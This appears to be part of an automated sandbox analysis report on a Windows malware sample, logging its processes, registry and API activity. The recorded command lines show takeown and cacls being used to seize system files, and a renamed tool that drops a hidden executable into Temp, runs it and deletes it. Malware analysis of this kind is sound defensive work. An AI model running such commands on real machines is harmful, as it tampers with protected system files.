| Write | STD_OUTPUT_HANDLE | size = 94 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x11cc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (25)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #170: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #170 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:51, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13c0 |
| Parent PID | 0x138c (c:\windows\syswow64\cacls.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1284
0x
504
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #172: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #172 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaec |
| Parent PID | 0xed0 (c:\windows\syswow64\takeown.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4BC
0x
1144
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #173: mxkefu6a.exe
181
0
| Information | Value |
|---|---|
| ID | #173 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "vt mapping.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:19, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10c4 |
| Parent PID | 0x10fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13DC
0x
117C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | os_pid = 0x13e0, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
